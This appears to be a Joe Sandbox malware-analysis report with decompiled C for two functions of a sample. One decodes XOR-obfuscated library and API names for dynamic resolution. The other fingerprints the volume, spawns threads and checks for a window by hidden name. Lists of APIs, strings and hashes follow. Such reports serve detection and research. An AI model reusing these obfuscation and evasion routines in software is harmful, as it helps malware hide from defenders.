Opcode Fuzzy Hash: 289a6ee6cf83d64bd691035d3179847e972630f6ab97801c835fadcb961318c9
Instruction Fuzzy Hash: BBF2E220C042998AEB1A9F28CD157F9BB74BF56308F0452DCD9892B553EB716BC9CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003B7C40 Relevance: 52.9, APIs: 18, Strings: 12, Instructions: 383
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E003B7C40() {
				signed int _v5;
				signed int _v6;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				signed char _v21;
				signed char _v22;
				signed char _v23;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				char _v27;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v43;
				char _v44;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				short _v52;
				intOrPtr _v56;
				char _v59;
				signed char _v60;
				char _v63;
				signed char _v64;
				char _v67;
				signed int _v68;
				char _v71;
				signed int _v72;
				char _v75;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v87;
				char _v88;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				short _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v107;
				signed int _v108;
				char _v111;
				signed int _v112;
				signed char _t198;
				struct HINSTANCE__* _t200;
				void* _t202;
				struct HINSTANCE__* _t204;
				void* _t205;
				void* _t208;
				struct HINSTANCE__* _t210;
				void* _t211;
				void* _t214;
				_Unknown_base(*)()* _t216;
				void* _t220;
				_Unknown_base(*)()* _t222;
				_Unknown_base(*)()* _t225;
				_Unknown_base(*)()* _t228;
				_Unknown_base(*)()* _t231;
				_Unknown_base(*)()* _t234;
				_Unknown_base(*)()* _t237;
				_Unknown_base(*)()* _t240;
				_Unknown_base(*)()* _t243;
				_Unknown_base(*)()* _t246;
				void* _t250;
				_Unknown_base(*)()* _t252;
				signed char _t257;
				struct HINSTANCE__* _t258;
				signed char _t262;
				signed char _t263;
				signed char _t264;
				signed char _t265;
				signed char _t266;
				signed char _t267;
				signed char _t268;
				void* _t269;
				signed char _t270;
				void* _t271;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t275;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t279;
				signed char _t280;
				signed char _t284;
				struct HINSTANCE__* _t285;
				void* _t288;

				_v28 = 0x3e;
				_v27 = 0xd;
				_v26 = 0x0000004d ^ _v28;
				_t262 = _v28;
				_v5 = 0x52;
				_v6 = 0x52;
				_v19 = _v5 ^ _t262;
				_t198 = _v6 ^ _t262;
				_v23 = _t198;
				_v18 = _t198;
				_t263 = _t262 ^ _t262;
				_v17 = 0;
				_t284 = 0x00000010 ^ _t262 ^ _t263;
				_v25 = _t284;
				_t257 = 0x0000005a ^ _t262 ^ _t263;
				_v24 = _t257;
				_v22 = _t263;
				_v21 = _t284;
				_v20 = _t257;
				_v17 = 0;
				_t200 = LoadLibraryA( &_v27); // executed
				_t258 = _t200;
				if(_t258 == 0) {
					L60:
					return 0;
				} else {
					_t264 = 0x48;
					_v44 = 0x2d203b48;
					_v40 = 0x7a7b2424;
					_t202 = 0;
					_v36 = 0x24242c66;
					_v32 = 0;
					while(1) {
						 *(_t288 + _t202 - 0x27) =  *(_t288 + _t202 - 0x27) ^ _t264;
						_t202 = _t202 + 1;
						if(_t202 >= 0xb) {
							break;
						}
						_t30 =  &_v44; // 0x2d203b48
						_t264 =  *_t30;
					}
					_v32 = 0;
					_t204 = LoadLibraryA( &_v43); // executed
					_v16 = _t204;
					if(_t204 == 0) {
						goto L60;
					} else {
						_t265 = 0x49;
						_v88 = 0x3b2c2249;
						_v84 = 0x7a252c27;
						_t205 = 0;
						_v80 = 0x252d677b;
						_v76 = 0x25;
						while(1) {
							 *(_t288 + _t205 - 0x53) =  *(_t288 + _t205 - 0x53) ^ _t265;
							_t205 = _t205 + 1;
							if(_t205 >= 0xc) {
								break;
							}
							_t42 =  &_v88; // 0x3b2c2249
							_t265 =  *_t42;
						}
						_v75 = 0;
						_t285 = LoadLibraryA( &_v87);
						if(_t285 == 0) {
							goto L60;
						} else {
							_t266 = 7;
							_v108 = 0x666a6e07;
							_v104 = 0x6b6f6260;
							_t208 = 0;
							_v100 = 0x6b632977;
							_v96 = 0x6b;
							while(1) {
								 *(_t288 + _t208 - 0x67) =  *(_t288 + _t208 - 0x67) ^ _t266;
								_t208 = _t208 + 1;
								if(_t208 >= 0xc) {
									break;
								}
								_t266 = _v108;
							}
							_v95 = 0;
							_t210 = LoadLibraryA( &_v107); // executed
							_v12 = _t210;
							if(_t210 == 0) {
								goto L60;
							} else {
								_t267 = 0xf;
								_v64 = 0x7d66590f;
								_v60 = 0x636e7a7b;
								_t211 = 0;
								_v56 = 0x6a6a7d49;
								_v52 = 0x774a;
								_v50 = 0;
								while(1) {
									 *(_t288 + _t211 - 0x3b) =  *(_t288 + _t211 - 0x3b) ^ _t267;
									_t211 = _t211 + 1;
									if(_t211 >= 0xd) {
										break;
									}
									_t267 = _v64;
								}
								_v50 = 0;
								 *0x6f6388 = GetProcAddress(_t285,  &_v63);
								_t268 = 0x47;
								_v60 = 0x282b0447;
								_t214 = 0;
								_v56 = 0x260f2234;
								_v52 = 0x222b2329;
								_v48 = 0;
								while(1) {
									 *(_t288 + _t214 - 0x37) =  *(_t288 + _t214 - 0x37) ^ _t268;
									_t214 = _t214 + 1;
									if(_t214 >= 0xb) {
										break;
									}
									_t268 = _v60;
								}
								_v48 = 0;
								_t216 = GetProcAddress(_t285,  &_v59);
								asm("movaps xmm0, [0x3c1a20]");
								_t269 = 0;
								 *0x6f6374 = _t216;
								asm("movups [ebp-0x44], xmm0");
								_v56 = 0x34382507;
								_v52 = 0x1e242432;
								_v48 = 0x33;
								do {
									 *(_t288 + _t269 - 0x43) =  *(_t288 + _t269 - 0x43) ^ _v72;
									_t269 = _t269 + 1;
								} while (_t269 < 0x18);
								_v47 = 0;
								 *0x6f6380 = GetProcAddress(_t258,  &_v71);
								_t270 = 0x28;
								_v60 = 0x46416e28;
								_t220 = 0;
								_v56 = 0x46417f4c;
								_v52 = 0x695f474c;
								_v48 = 0;
								while(1) {
									 *(_t288 + _t220 - 0x37) =  *(_t288 + _t220 - 0x37) ^ _t270;
									_t220 = _t220 + 1;
									if(_t220 >= 0xb) {
										break;
									}
									_t270 = _v60;
								}
								_v48 = 0;
								_t222 = GetProcAddress(_t258,  &_v59);
								asm("movaps xmm0, [0x3c19f0]");
								_t271 = 0;
								 *0x6f6354 = _t222;
								asm("movups [ebp-0x40], xmm0");
								_v52 = 0x252024;
								do {
									 *(_t288 + _t271 - 0x3f) =  *(_t288 + _t271 - 0x3f) ^ _v68;
									_t271 = _t271 + 1;
								} while (_t271 < 0x12);
								_v49 = 0;
								_t225 = GetProcAddress(_t285,  &_v67);
								asm("movaps xmm0, [0x3c1f70]");
								_t272 = 0;
								 *0x6f637c = _t225;
								asm("movups [ebp-0x40], xmm0");
								_v52 = 0x606b76;
								do {
									 *(_t288 + _t272 - 0x3f) =  *(_t288 + _t272 - 0x3f) ^ _v68;
									_t272 = _t272 + 1;
								} while (_t272 < 0x12);
								_v49 = 0;
								_t228 = GetProcAddress(_t285,  &_v67);
								asm("movaps xmm0, [0x3c16f0]");
								_t273 = 0;
								 *0x6f6384 = _t228;
								asm("movups [ebp-0x40], xmm0");
								_v52 = 0x1a11;
								_v50 = 0;
								do {
									 *(_t288 + _t273 - 0x3f) =  *(_t288 + _t273 - 0x3f) ^ _v68;
									_t273 = _t273 + 1;
								} while (_t273 < 0x11);
								_v50 = 0;
								_t231 = GetProcAddress(_t285,  &_v67);
								asm("movaps xmm0, [0x3c1f40]");
								_t274 = 0;
								 *0x6f6370 = _t231;
								asm("movups [ebp-0x44], xmm0");
								_v56 = 0x70766b7e;
								_v52 = 0x5e71;
								_v50 = 0;
								do {
									 *(_t288 + _t274 - 0x43) =  *(_t288 + _t274 - 0x43) ^ _v72;
									_t274 = _t274 + 1;
								} while (_t274 < 0x15);
								_v50 = 0;
								_t234 = GetProcAddress(_t285,  &_v71);
								asm("movaps xmm0, [0x3c1fe0]");
								_t275 = 0;
								 *0x6f635c = _t234;
								asm("movups [ebp-0x40], xmm0");
								_v52 = 0x507c6442;
								_v48 = 0;
								do {
									 *(_t288 + _t275 - 0x3f) =  *(_t288 + _t275 - 0x3f) ^ _v68;
									_t275 = _t275 + 1;
								} while (_t275 < 0x13);
								_v48 = 0;
								_t237 = GetProcAddress(_v12,  &_v67);
								asm("movaps xmm0, [0x3c1620]");
								_t276 = 0;
								 *0x6f6358 = _t237;
								asm("movups [ebp-0x68], xmm0");
								do {
									 *(_t288 + _t276 - 0x67) =  *(_t288 + _t276 - 0x67) ^ _v108;
									_t276 = _t276 + 1;
								} while (_t276 < 0xe);
								_v93 = 0;
								_t240 = GetProcAddress(_t285,  &_v107);
								asm("movaps xmm0, [0x3c1ba0]");
								_t277 = 0;
								 *0x6f6378 = _t240;
								asm("movups [ebp-0x6c], xmm0");
								_v96 = 0x5047414e;
								_v92 = 0;
								do {
									 *(_t288 + _t277 - 0x6b) =  *(_t288 + _t277 - 0x6b) ^ _v112;
									_t277 = _t277 + 1;
								} while (_t277 < 0x13);
								_v92 = 0;
								_t243 = GetProcAddress(_t285,  &_v111);
								asm("movaps xmm0, [0x3c1890]");
								_t278 = 0;
								 *0x6f638c = _t243;
								asm("movups [ebp-0x6c], xmm0");
								_v96 = 0x3d1911;
								do {
									 *(_t288 + _t278 - 0x6b) =  *(_t288 + _t278 - 0x6b) ^ _v112;
									_t278 = _t278 + 1;
								} while (_t278 < 0x12);
								_v93 = 0;
								_t246 = GetProcAddress(_t285,  &_v111);
								asm("movaps xmm0, [0x3c1b00]");
								_t279 = 0;
								 *0x6f6350 = _t246;
								asm("movups [ebp-0x6c], xmm0");
								_v96 = 0x1a;
								do {
									 *(_t288 + _t279 - 0x6b) =  *(_t288 + _t279 - 0x6b) ^ _v112;
									_t279 = _t279 + 1;
								} while (_t279 < 0x10);
								_v95 = 0;
								 *0x6f634c = GetProcAddress(_t285,  &_v111);
								_t280 = 0x54;
								_v108 = 0x313c0754;
								_t250 = 0;
								_v104 = 0x2c113838;
								_v100 = 0x20213731;
								_v96 = 0x1531;
								_v94 = 0;
								while(1) {
									 *(_t288 + _t250 - 0x67) =  *(_t288 + _t250 - 0x67) ^ _t280;
									_t250 = _t250 + 1;
									if(_t250 >= 0xd) {
										break;
									}
									_t280 = _v108;
								}
								_v94 = 0;
								_t252 = GetProcAddress(_v16,  &_v107);
								 *0x6f636c = _t252;
								if( *0x6f637c == 0 ||  *0x6f6384 == 0 ||  *0x6f6370 == 0 ||  *0x6f6378 == 0 ||  *0x6f6354 == 0 ||  *0x6f638c == 0 || _t252 == 0 ||  *0x6f6388 == 0 ||  *0x6f6374 == 0 ||  *0x6f6380 == 0 ||  *0x6f635c == 0 ||  *0x6f6358 == 0 ||  *0x6f634c == 0 ||  *0x6f6350 == 0) {
									goto L60;
								} else {
									return 1;
								}
							}
						}
					}
				}
			}

0x003b7c49
0x003b7c59
0x003b7c5e
0x003b7c63
0x003b7c68
0x003b7c75
0x003b7c79
0x003b7c89
0x003b7c8b
0x003b7c90
0x003b7c93
0x003b7c98
0x003b7c9c
0x003b7c9e
0x003b7ca1
0x003b7ca3
0x003b7ca7
0x003b7caa
0x003b7cad
0x003b7cb0
0x003b7cb4
0x003b7cb6
0x003b7cba
0x003b8126
0x003b812c
0x003b7cc0
0x003b7cc0
0x003b7cc2
0x003b7cc9
0x003b7cd0
0x003b7cd2
0x003b7cd9
0x003b7ce0
0x003b7ce0
0x003b7ce4
0x003b7ce8
0x00000000
0x00000000
0x003b7cea
0x003b7cea
0x003b7cea
0x003b7cf2
0x003b7cf7
0x003b7cf9
0x003b7cfe
0x00000000
0x003b7d04
0x003b7d04
0x003b7d06
0x003b7d0d
0x003b7d14
0x003b7d16
0x003b7d1d
0x003b7d23
0x003b7d23
0x003b7d27
0x003b7d2b
0x00000000
0x00000000
0x003b7d2d
0x003b7d2d
0x003b7d2d
0x003b7d35
0x003b7d3c
0x003b7d40
0x00000000
0x003b7d46
0x003b7d46
0x003b7d48
0x003b7d4f
0x003b7d56
0x003b7d58
0x003b7d5f
0x003b7d65
0x003b7d65
0x003b7d69
0x003b7d6d
0x00000000
0x00000000
0x003b7d6f
0x003b7d6f
0x003b7d77
0x003b7d7c
0x003b7d7e
0x003b7d83
0x00000000
0x003b7d89
0x003b7d89
0x003b7d8b
0x003b7d92
0x003b7d99
0x003b7d9b
0x003b7da2
0x003b7da8
0x003b7db0
0x003b7db0
0x003b7db4
0x003b7db8
0x00000000
0x00000000
0x003b7dba
0x003b7dba
0x003b7dca
0x003b7dd0
0x003b7dd5
0x003b7dd7
0x003b7dde
0x003b7de0
0x003b7de7
0x003b7dee
0x003b7df2
0x003b7df2
0x003b7df6
0x003b7dfa
0x00000000
0x00000000
0x003b7dfc
0x003b7dfc
0x003b7e04
0x003b7e0a
0x003b7e0c
0x003b7e13
0x003b7e15
0x003b7e1a
0x003b7e1e
0x003b7e25
0x003b7e2c
0x003b7e32
0x003b7e35
0x003b7e39
0x003b7e3a
0x003b7e42
0x003b7e4a
0x003b7e4f
0x003b7e51
0x003b7e58
0x003b7e5a
0x003b7e61
0x003b7e68
0x003b7e70
0x003b7e70
0x003b7e74
0x003b7e78
0x00000000
0x00000000
0x003b7e7a
0x003b7e7a
0x003b7e82
0x003b7e88
0x003b7e8a
0x003b7e91
0x003b7e93
0x003b7e98
0x003b7e9c
0x003b7ea3
0x003b7ea6
0x003b7eaa
0x003b7eab
0x003b7eb3
0x003b7eb9
0x003b7ebb
0x003b7ec2
0x003b7ec4
0x003b7ec9
0x003b7ecd
0x003b7ed4
0x003b7ed7
0x003b7edb
0x003b7edc
0x003b7ee4
0x003b7eea
0x003b7eec
0x003b7ef3
0x003b7ef5
0x003b7efa
0x003b7efe
0x003b7f04
0x003b7f08
0x003b7f0b
0x003b7f0f
0x003b7f10
0x003b7f18
0x003b7f1e
0x003b7f20
0x003b7f27
0x003b7f29
0x003b7f2e
0x003b7f32
0x003b7f39
0x003b7f3f
0x003b7f43
0x003b7f46
0x003b7f4a
0x003b7f4b
0x003b7f53
0x003b7f59
0x003b7f5b
0x003b7f62
0x003b7f64
0x003b7f69
0x003b7f6d
0x003b7f74
0x003b7f78
0x003b7f7b
0x003b7f7f
0x003b7f80
0x003b7f88
0x003b7f90
0x003b7f92
0x003b7f99
0x003b7f9b
0x003b7fa0
0x003b7fa4
0x003b7fa7
0x003b7fab
0x003b7fac
0x003b7fb4
0x003b7fba
0x003b7fbc
0x003b7fc3
0x003b7fc5
0x003b7fca
0x003b7fce
0x003b7fd5
0x003b7fe0
0x003b7fe3
0x003b7fe7
0x003b7fe8
0x003b7ff0
0x003b7ff6
0x003b7ff8
0x003b7fff
0x003b8001
0x003b8006
0x003b800a
0x003b8011
0x003b8014
0x003b8018
0x003b8019
0x003b8021
0x003b8027
0x003b8029
0x003b8030
0x003b8032
0x003b8037
0x003b803b
0x003b8041
0x003b8044
0x003b8048
0x003b8049
0x003b8051
0x003b8059
0x003b805e
0x003b8060
0x003b8067
0x003b8069
0x003b8070
0x003b8077
0x003b807d
0x003b8081
0x003b8081
0x003b8085
0x003b8089
0x00000000
0x00000000
0x003b808b
0x003b808b
0x003b8093
0x003b809b
0x003b80a4
0x003b80a9
0x00000000
0x003b811b
0x003b8123
0x003b8123
0x003b80a9
0x003b7d83
0x003b7d40
0x003b7cfe

APIs

LoadLibraryA.KERNELBASE(?), ref: 003B7CB4
LoadLibraryA.KERNELBASE(?), ref: 003B7CF7
LoadLibraryA.KERNEL32(?), ref: 003B7D3A
LoadLibraryA.KERNELBASE(?), ref: 003B7D7C
GetProcAddress.KERNEL32(00000000,?), ref: 003B7DCE
GetProcAddress.KERNEL32(00000000,?), ref: 003B7E0A
GetProcAddress.KERNEL32(00000000,?), ref: 003B7E48
GetProcAddress.KERNEL32(00000000,?), ref: 003B7E88
GetProcAddress.KERNEL32(00000000,?), ref: 003B7EB9
GetProcAddress.KERNEL32(00000000,?), ref: 003B7EEA
GetProcAddress.KERNEL32(00000000,?), ref: 003B7F1E
GetProcAddress.KERNEL32(00000000,?), ref: 003B7F59
GetProcAddress.KERNEL32(?,?), ref: 003B7F90
GetProcAddress.KERNEL32(00000000,?), ref: 003B7FBA
GetProcAddress.KERNEL32(00000000,?), ref: 003B7FF6
GetProcAddress.KERNEL32(00000000,?), ref: 003B8027
GetProcAddress.KERNEL32(00000000,?), ref: 003B8057
GetProcAddress.KERNEL32(?,?), ref: 003B809B

Strings

H; -$${zf,$$, xrefs: 003B7CEA
3, xrefs: 003B7E2C
R, xrefs: 003B7C75
~kvp, xrefs: 003B7F32
>, xrefs: 003B7C49
I",;',%z{g-%%, xrefs: 003B7D2D
17! , xrefs: 003B8070
Bd|P, xrefs: 003B7F6D
R, xrefs: 003B7C68
(nAF, xrefs: 003B7E51
NAGP, xrefs: 003B7FCE
`bok, xrefs: 003B7D4F

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: (nAF$17! $3$>$Bd|P$H; -$${zf,$$$I",;',%z{g-%%$NAGP$R$R$`bok$~kvp
API String ID: 2238633743-3476695568
Opcode ID: a6295c315a948fde2e37eb1cb1388da13563f1c5cee5f3eda782d36b735a6cea
Instruction ID: 33de70e56988857c80523852687fdfe848307d43c94beb295f93ff58b6932a25
Opcode Fuzzy Hash: a6295c315a948fde2e37eb1cb1388da13563f1c5cee5f3eda782d36b735a6cea
Instruction Fuzzy Hash: C1F19D70C192C88ADB06CBB8E8447FEBFF8AF1A308F14615DD480BB652D774558ACB65

Uniqueness

Uniqueness Score: -1.00%

Function 003B3520 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 315
threadsleepCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E003B3520(void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				CHAR* _v16;
				int _v24;
				signed int _v32;
				void* _v300;
				char _v564;
				signed int _v568;
				CHAR* _v572;
				long _v576;
				long _v580;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				signed int _v593;
				char _v598;
				short _v600;
				intOrPtr _v604;
				CHAR* _v608;
				char _v624;
				char _v635;
				signed int _v636;
				CHAR* _v640;
				intOrPtr _v644;
				CHAR* _v648;
				char _v664;
				void* __ebx;
				signed int _t97;
				signed int _t98;
				int _t99;
				char _t107;
				intOrPtr _t108;
				char* _t115;
				void* _t126;
				void* _t129;
				intOrPtr* _t136;
				void* _t137;
				signed int _t143;
				intOrPtr _t146;
				intOrPtr _t152;
				intOrPtr _t155;
				void* _t158;
				intOrPtr _t159;
				char* _t165;
				void* _t178;
				intOrPtr _t188;
				char _t190;
				char _t191;
				intOrPtr _t192;
				void* _t193;
				intOrPtr* _t194;
				void* _t199;
				intOrPtr _t200;
				intOrPtr _t201;
				intOrPtr _t206;
				void* _t213;
				void* _t214;
				void* _t217;
				signed int _t224;
				void* _t225;
				signed int _t227;
				void* _t229;
				signed int _t232;
				void* _t235;

				_t193 = __edx;
				_t158 = _t229;
				_t232 = (_t229 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t158 + 4));
				_t227 = _t232;
				_t97 =  *0x3c500c; // 0x4b5ee95b
				_t98 = _t97 ^ _t227;
				_v32 = _t98;
				_t99 =  &_v24;
				 *[fs:0x0] = _t99;
				_v640 = 0;
				__imp___time64(0, _t98, __esi, _t158,  *[fs:0x0], E003BF702, 0xffffffff, _t225);
				srand(_t99);
				_t235 = _t232 - 0x27c + 8;
				_t194 = E003B3300(_t158, _t193, __edi, __esi);
				_t6 = _t194 + 1; // 0x1
				_t217 = _t6;
				goto L1;
				do {
					L3:
					_t107 =  *_t165;
					_t165 = _t165 + 1;
				} while (_t107 != 0);
				_t108 =  *0x6f5bac; // 0x1f
				E003B5DD0(_t158,  &_v624, __edi, _t217, _t108 + _t165 - _t199);
				E003B4CF0( &_v624,  &_v591);
				E003B4D60( &_v624, 0x6f5b9c);
				_t115 = E003B4CF0( &_v624,  &_v587);
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x28c], xmm0");
				asm("movq xmm0, [eax+0x10]");
				 *(_t115 + 0x10) = 0;
				 *((intOrPtr*)(_t115 + 0x14)) = 0xf;
				 *_t115 = 0;
				asm("movq [ebp-0x27c], xmm0");
				E003B4E60(0x6f5bb4,  &_v664);
				_t200 = _v644;
				if(_t200 < 0x10) {
					L9:
					_v16 = 0xffffffff;
					_t201 = _v604;
					if(_t201 >= 0x10) {
						_t191 = _v624;
						_t213 = _t201 + 1;
						_t152 = _t191;
						if(_t213 >= 0x1000) {
							_t191 =  *((intOrPtr*)(_t191 - 4));
							_t213 = _t213 + 0x23;
							if(_t152 > 0x1f) {
								__imp___invalid_parameter_noinfo_noreturn();
							}
						}
						_push(_t213);
						E003BE78C(_t152, _t191);
						_t235 = _t235 + 8;
					}
					_v588 = 0x46;
					_v584 = 0;
					_v587 = 0x43;
					_v608 = 0;
					_v604 = 0xf;
					_v624 = 0;
					_v586 = 0x3a;
					_v585 = 0x59;
					_v584 = 0;
					GetVolumeInformationA( &_v587, 0, 0, 0x6f62e8,  &_v580,  &_v576,  &_v564, 0x104); // executed
					_t126 = CreateThread(0, 0, E003B6560, 0, 0, 0); // executed
					if(_t126 == 0xffffffff) {
						L29:
						 *[fs:0x0] = _v24;
						return E003BE3D0(_v32 ^ _t227);
					} else {
						CloseHandle(_t126);
						Sleep(0x3e8); // executed
						_t129 = CreateThread(0, 0, E003B6620, 0, 0, 0); // executed
						if(_t129 == 0xffffffff) {
							goto L29;
						}
						asm("movaps xmm0, [0x3c1710]");
						_t178 = 0;
						asm("movups [ebp-0x270], xmm0");
						_v593 = 0;
						asm("movaps xmm0, [0x3c1810]");
						asm("movups [ebp-0x260], xmm0");
						_v604 = 0x1e020517;
						_v600 = 0x517;
						_v598 = 0;
						do {
							 *(_t227 + _t178 - 0x26f) =  *(_t227 + _t178 - 0x26f) ^ _v636;
							_t178 = _t178 + 1;
						} while (_t178 < 0x25);
						_v598 = 0;
						FindWindowA( &_v635, 0); // executed
						_t180 =  !=  ? 1 : _v593 & 0x000000ff;
						_v592 =  !=  ? 1 : _v593 & 0x000000ff;
						_push(0x104);
						_v568 = 0;
						_v572 = 0;
						if(GetModuleFileNameA( *((intOrPtr*)( *0x6f634c))(), 0,  &_v300) != 0) {
							_t136 =  *0x6f6358; // 0x75dba2b0
							_t137 =  *_t136( &_v300,  &_v568,  &_v572); // executed
							if(_t137 == 0) {
								if(_v592 != _t137) {
									 *0x6f6364 =  *0x6f6364 + 1;
								} else {
									 *0x6f5d18 =  *0x6f5d18 + (_v568 & 0xffffff00 | _v568 == _v572) - 1;
								}
								E003B4E60("Unknown", E003BC6B0( &_v664));
								_t206 = _v644;
								if(_t206 >= 0x10) {
									_t190 = _v664;
									_t206 = _t206 + 1;
									_t146 = _t190;
									if(_t206 >= 0x1000) {
										_t190 =  *((intOrPtr*)(_t190 - 4));
										_t206 = _t206 + 0x23;
										if(_t146 > 0x1f) {
											__imp___invalid_parameter_noinfo_noreturn();
										}
									}
									_push(_t206);
									E003BE78C(_t146, _t190);
								}
								_push(1);
								_v648 = 0;
								_v644 = 0xf;
								_v664 = 0;
								E003B51D0(0x6f5cb8, _t206, 0x3c15c4);
								_t188 =  *0x6f6308; // 0xc9c790
								 *0x6f62ec = 1;
								_t224 = ((0x92492493 * (_t188 -  *0x6f6304) >> 0x20) + _t188 -  *0x6f6304 >> 4 >> 0x1f) + ((0x92492493 * (_t188 -  *0x6f6304) >> 0x20) + _t188 -  *0x6f6304 >> 4);
								_t143 = rand();
								 *0x3c5020 = 0;
								 *0x6f62f4 = 1;
								_t212 =  !=  ? 0 : _t143 % _t224;
								 *0x6f62f0 =  !=  ? 0 : _t143 % _t224;
							}
						}
						goto L29;
					}
				}
				_t192 = _v664;
				_t214 = _t200 + 1;
				_t155 = _t192;
				if(_t214 >= 0x1000) {
					_t192 =  *((intOrPtr*)(_t192 - 4));
					_t214 = _t214 + 0x23;
					if(_t155 > 0x1f) {
						__imp___invalid_parameter_noinfo_noreturn();
					}
				}
				_push(_t214);
				E003BE78C(_t155, _t192);
				_t235 = _t235 + 8;
				goto L9;
				L1:
				_t159 =  *_t194;
				_t194 = _t194 + 1;
				if(_t159 != 0) {
					goto L1;
				} else {
					_push(_t194 - _t217);
					E003B51D0(0x6f5b9c, _t194 - _t217, _t100);
					_v584 = 0;
					_v589 = 0;
					_v588 = 0xb;
					_v584 = 0;
					_v587 = 0x20;
					_v585 = 0x20;
					_v589 = 0;
					_v586 = 6;
					_v592 = 0x35;
					_v591 = 0x2d;
					_v590 = 0x20;
					_v16 = 0;
					_t165 =  &_v591;
					_v608 = 0;
					_t199 = _t165 + 1;
					_v604 = 0xf;
					_v624 = 0;
					_v640 = 1;
					goto L3;
				}
			}

0x003b3520
0x003b3521
0x003b3529
0x003b3530
0x003b3534
0x003b354b
0x003b3550
0x003b3552
0x003b3557
0x003b355a
0x003b3562
0x003b356c
0x003b3576
0x003b357c
0x003b3584
0x003b3586
0x003b3586
0x003b3586
0x003b3638
0x003b3638
0x003b3638
0x003b363a
0x003b363b
0x003b363f
0x003b364f
0x003b3661
0x003b3671
0x003b3683
0x003b368d
0x003b3690
0x003b3697
0x003b369c
0x003b36a3
0x003b36aa
0x003b36b4
0x003b36bc
0x003b36c1
0x003b36ca
0x003b36fd
0x003b36fd
0x003b3704
0x003b370d
0x003b370f
0x003b3715
0x003b3716
0x003b371e
0x003b3720
0x003b3723
0x003b372e
0x003b3730
0x003b3730
0x003b372e
0x003b3736
0x003b3738
0x003b373d
0x003b373d
0x003b374f
0x003b3757
0x003b375e
0x003b3768
0x003b3774
0x003b3780
0x003b378d
0x003b379a
0x003b37a7
0x003b37bf
0x003b37d6
0x003b37db
0x003b39e3
0x003b39e6
0x003b39ff
0x003b37e1
0x003b37e2
0x003b37ed
0x003b3802
0x003b3807
0x00000000
0x00000000
0x003b380d
0x003b3814
0x003b381c
0x003b3823
0x003b382a
0x003b3831
0x003b3838
0x003b3842
0x003b384b
0x003b3852
0x003b3858
0x003b385f
0x003b3860
0x003b386d
0x003b3875
0x003b3890
0x003b3893
0x003b389f
0x003b38a7
0x003b38b1
0x003b38c2
0x003b38c8
0x003b38e2
0x003b38e6
0x003b38f2
0x003b390d
0x003b38f4
0x003b3905
0x003b3905
0x003b3924
0x003b3929
0x003b3932
0x003b3934
0x003b393a
0x003b393b
0x003b3943
0x003b3945
0x003b3948
0x003b3953
0x003b3955
0x003b3955
0x003b3953
0x003b395b
0x003b395d
0x003b3962
0x003b3965
0x003b3971
0x003b397b
0x003b3985
0x003b398c
0x003b3991
0x003b39a4
0x003b39b8
0x003b39ba
0x003b39c2
0x003b39cd
0x003b39da
0x003b39dd
0x003b39dd
0x003b38e6
0x00000000
0x003b38c2
0x003b37db
0x003b36cc
0x003b36d2
0x003b36d3
0x003b36db
0x003b36dd
0x003b36e0
0x003b36eb
0x003b36ed
0x003b36ed
0x003b36eb
0x003b36f3
0x003b36f5
0x003b36fa
0x00000000
0x003b3590
0x003b3590
0x003b3592
0x003b3595
0x00000000
0x003b3597
0x003b359e
0x003b35a0
0x003b35a7
0x003b35b0
0x003b35b9
0x003b35c1
0x003b35ca
0x003b35d2
0x003b35da
0x003b35e3
0x003b35eb
0x003b35f7
0x003b35fd
0x003b3603
0x003b360a
0x003b3610
0x003b361a
0x003b361d
0x003b3627
0x003b362e
0x00000000
0x003b362e

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,4B5EE95B), ref: 003B356C
srand.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 003B3576

Part of subcall function 003B3300: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,4B5EE95B), ref: 003B332D
Part of subcall function 003B3300: srand.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 003B3334
Part of subcall function 003B3300: rand.API-MS-WIN-CRT-UTILITY-L1-1-0(003C1460,0000000C,003C145D,00000000), ref: 003B33A0
Part of subcall function 003B3300: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?), ref: 003B3430

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,006F5B9C,?,0000001F,00000000,00000001), ref: 003B36ED
